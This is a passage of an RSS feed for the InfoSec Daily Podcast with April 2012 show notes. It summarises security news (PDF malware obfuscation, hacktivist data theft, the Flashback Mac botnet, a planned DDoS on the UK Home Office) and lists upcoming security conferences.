<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://nakedsecurity.sophos.com/2012/04/05/ccittfax-pdf-malware/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2012/04/05/ccittfax-pdf-malware/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security experts are playing a game of cat-and-mouse game with malware authors who are continually looking for ways to bypass detection by anti-malware products.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As regular readers of Naked Security will know, one commonly-seen method of distributing malware is to embed an attack inside a malformed PDF. And, one way to hide code inside a malicious PDF is to use filters.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Filters are used by PDFs to compress or store data to either make the file smaller (Flate, CCITTFax) or allow it to be read as text (ASCIIHex).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">By combining the filters in weird ways the malware author hopes to bypass detection by malware scanners and deliver a malicious payload to the victim.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last April, we saw some PDF malware using</span><a href="http://nakedsecurity.sophos.com/2011/04/18/orders-spam-new-trick-in-pdf-malware/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">/DecodeParams</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> filter to obfuscate malicious code. &nbsp;When I saw it I knew we would see more PDF malware using</span><a href="http://nakedsecurity.sophos.com/2010/10/08/malicious-pdfs-points-vb2010-presentation/#Heuristic_4"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">image filters</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to obfuscate malicious payloads. &nbsp;Sadly, that prediction appears to have become true.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Late last month, while analysing samples received via the</span><a href="http://wepawet.iseclab.org/"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Wepawet project</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> I saw the first use of the CCITTFax filter to hide malicious content (detected as</span><a href="http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj%7EPDFJs-WT/detailed-analysis.aspx"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Troj/PDFJs-WT</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> by Sophos products).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.v3.co.uk/v3-uk/news/2165469/anonymous-lulzec-hackers-evolving-target-corporate-cause-financial-pain"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.v3.co.uk/v3-uk/news/2165469/anonymous-lulzec-hackers-evolving-target-corporate-cause-financial-pain</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hacker groups Anonymous and LulzSec are changing tactics to target firms&#39; corporate data in order to hurt them financially, rather than cause embarrassment by affecting websites, according to new research from security firm Imperva.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In its latest</span><a href="http://www.imperva.com/docs/HII_Remote_and_Local_File_Inclusion_Vulnerabilities.pdf"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Hacker Intelligence Initiative</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> report Imperva researchers said they had seen a marked change in hacktivists&#39; behaviour, with groups moving away from defacing websites or knocking them offline to stealing data.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Specifically, Imperva researchers reported discovering that 21 per cent of all recorded incidents from June to November 2011 saw hackers mounting local and remote file inclusion (RFI/LFI) attacks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The statistic was widely attributed to hacktivists, such as the Anonymous collective and LulzSec group.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A form of attack that targets PHP coding, the use of RFI/LFI techniques allows hackers to steal data by manipulating the company&#39;s web server, and indicates a step away from their usual tendency to target companies&#39; websites with distributed denial of service (DDoS) assaults.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Speaking to </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">V3</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Imperva researcher Tal Be&#39;ery claimed that the behaviour is systematic of evolution within hacktivism that occurred after the</span><a href="http://www.google.co.uk/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=3&amp;ved=0CEEQFjAC&amp;url=http%3A%2F%2Fwww.v3.co.uk%2Fv3-uk%2Fnews%2F2071113%2Fsony-brings-services-online-massive-hack&amp;ei=Xcx5T77sEKbB0QW5gq2fDQ&amp;usg=AFQjCNHZlL-NNI6HRFw6EMrcIYF6TdYikA&amp;sig2=Qz229e06r-fK8kaWUFS5pw"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">high-profile Sony data breach</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;The motivation hasn&#39;t changed but rather the method. Pre-Sony, hacktivism&#39;s aim was website defacement which could be embarrassing but had no long term impact,&quot; he said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Stealing data from Sony and exposing it showed hacktivists how to damage companies financially. The data theft at Sony &#8211; and other locations &#8211; seriously hurt the company. But also the breach inspired hacktivists to make data theft their first objective.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.reuters.com/article/2012/04/04/us-hacker-china-idUSBRE8331D720120404"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.reuters.com/article/2012/04/04/us-hacker-china-idUSBRE8331D720120404</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A hacker has posted thousands of internal documents he says he obtained by breaking into the network of a Chinese company with defense contracts, an unusual extension of the phenomenon of activist hacking into the world&#39;s most populous country.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The hacker, who uses the name Hardcore Charlie and said he was a friend of Hector Xavier Monsegur, the leader-turned- informant of the activist hacking group, LulzSec, told Reuters he got inside Beijing-based China National Import &amp; Export Corp (CEIEC).</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">He posted documents ranging from purported U.S. military transport information to internal reports about business matters on several file-sharing sites, but the authenticity of the documents could not be independently confirmed.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Beijing company, better known by the acronym, CEIEC, did not respond to a request for comment. U.S. intelligence and Department of Defense officials had no immediate comment.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CEIEC&#39;s website says the company performs systems integration work for the Chinese military.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cyber-spying, both economic and political, is a growing concern for companies and governments around the world. The Chinese government is often accused of promoting, or at least tolerating, hacking attacks aimed at Western targets. But Chinese institutions have rarely been publicly identified as victims of such attacks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://arstechnica.com/apple/news/2012/04/flashback-trojan-reportedly-controls-half-a-million-macs-and-counting.ars"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://arstechnica.com/apple/news/2012/04/flashback-trojan-reportedly-controls-half-a-million-macs-and-counting.ars</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Variations of the Flashback trojan have reportedly infected more than half a million Macs around the globe, according to Russian antivirus company Dr. Web. The company made an announcement on Wednesday&mdash;first in Russian and later in English&mdash;about the growing Mac botnet, first claiming 550,000 infected Macs. Later in the day, however, Dr. Web malware analyst Sorokin Ivan posted to</span><a href="https://twitter.com/#%21/hexminer/status/187623741273026562"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Twitter</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> that the count had gone up to 600,000, with 274 bots even checking in from Cupertino, CA, where Apple&#39;s headquarters are located.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We have been covering the Mac Flashback trojan since 2011, but the most recent variant from earlier this week targeted an unpatched Java vulnerability within Mac OS X. That is, it was unpatched (at the time) by Apple&mdash;Oracle had released a fix for the vulnerability in February of this year, but Apple didn&#39;t send out a fix until earlier this week, after news began to spread about the latest Flashback variant.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to Dr. Web, the 57 percent of the infected Macs are located in the US and 20 percent are in Canada. Like older versions of the malware, the latest Flashback variant searches an infected Mac for a number of antivirus applications before generating a list of botnet control servers and beginning the process of checking in with them. Now that</span><a href="http://support.apple.com/kb/HT5228?viewlocale=en_US&amp;locale=en_US"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">the fix</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> for the Java vulnerability is out, however, there&#39;s no excuse not to update&mdash;the malware installs itself after you visit a compromised or malicious webpage, so if you&#39;re on the Internet, you&#39;re potentially at risk.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcadvisor.co.uk/news/security/3349527/anonymous-planning-attack-on-home-office-website"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/security/3349527/anonymous-planning-attack-on-home-office-website</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">UK hackers linked to the Anonymous group are encouraging supporters to attack the Home Office website this Saturday (7 April) in protest at the extradition of three UK citizens to the US.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The planned attack, given the Twitter moniker of #OpTrialAtHome is being encouraged by the</span><a href="https://twitter.com/#%21/AnonOpUK"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">@AnonOpUK</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> hacktivist group, which has publicised the attack on its Twitter page.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The group says its action is in protest against the extradition of UFO hacker Gary McKinnon, businessman Christopher Tappin and Richard O&#39;Dwyer to the US. O&#39;Dwyer controlled a website that carried links to TV programmes and films that allegedly broke US copyright law.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Supporters have been encouraged to launch denial-of-service attacks on the Home Office&#39;s IP address, which Anonymous has revealed. Those not savvy enough to launch automated attacks on the site could contribute to the effect by simply visiting the site in large numbers.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;#OpTrialAtHome has been initiated, we are inviting every #Anon to join us in our fight against #Extradition and the #EAW [European Arrest Warrant],&quot; said the group on it&#39;s Twitter account.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">McKinnon and O&#39;Dwyer are still fighting extradition, and Tappin is already in the US awaiting trial for allegedly dealing in banned weapons materials to Iran.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-639-ccittfax-lulzsecanonymous-tactics-ceiec-flashback-and-optrialathome/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3738/0/infosec-daily-podcast-episode-639.mp3" length="21015492" type="audio/mpeg" />
		<itunes:duration>0:43:44</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 639 for April 6, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 639 for April 6, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Geordy Rostad, and Dr. Bonez.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories
Source: &#160;http://nakedsecurity.sophos.com/2012/04/05/ccittfax-pdf-malware/
Security experts are playing a game of cat-and-mouse game with malware authors who are continually looking for ways to bypass detection by anti-malware products.
As regular readers of Naked Security will know, one commonly-seen method of distributing malware is to embed an attack inside a malformed PDF. And, one way to hide code inside a malicious PDF is to use filters.
Filters are used by PDFs to compress or store data to either make the file smaller (Flate, CCITTFax) or allow it to be read as text (ASCIIHex).
By combining the filters in weird ways the malware author hopes to bypass detection by malware scanners and deliver a malicious payload to the victim.
Last April, we saw some PDF malware using /DecodeParams filter to obfuscate malicious code. &#160;When I saw it I knew we would see more PDF malware using image filters to obfuscate malicious payloads. &#160;Sadly, that prediction appears to have become true.
Late last month, while analysing samples received via the Wepawet project I saw the first use of the CCITTFax filter to hide malicious content (detected as Troj/PDFJs-WT by Sophos products).
&#8230;
Source: &#160;http://www.v3.co.uk/v3-uk/news/2165469/anonymous-lulzec-hackers-evolving-target-corporate-cause-financial-pain
Hacker groups Anonymous and LulzSec are changing tactics to target firms&#39; corporate data in order to hurt them financially, rather than cause embarrassment by affecting websites, according to new research from security firm Imperva.
In its latest Hacker Intelligence Initiative report Imperva researchers said they had seen a marked change in hacktivists&#39; behaviour, with groups moving away from defacing websites or knocking them offline to stealing data.
Specifically, Imperva researchers reported discovering that 21 per cent of all recorded incidents from June to November 2011 saw hackers mounting local and remote file inclusion (RFI/LFI) attacks.
The [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 638 &#8211; Interview with Paul Royal</title>
		<link>http://www.isdpodcast.com/episode-638-interview-with-paul-royal</link>
		<comments>http://www.isdpodcast.com/episode-638-interview-with-paul-royal#comments</comments>
		<pubDate>Fri, 06 Apr 2012 00:56:30 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3732</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 638 for April 5, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 638 for April 5, 2012. </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.outerz0ne.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
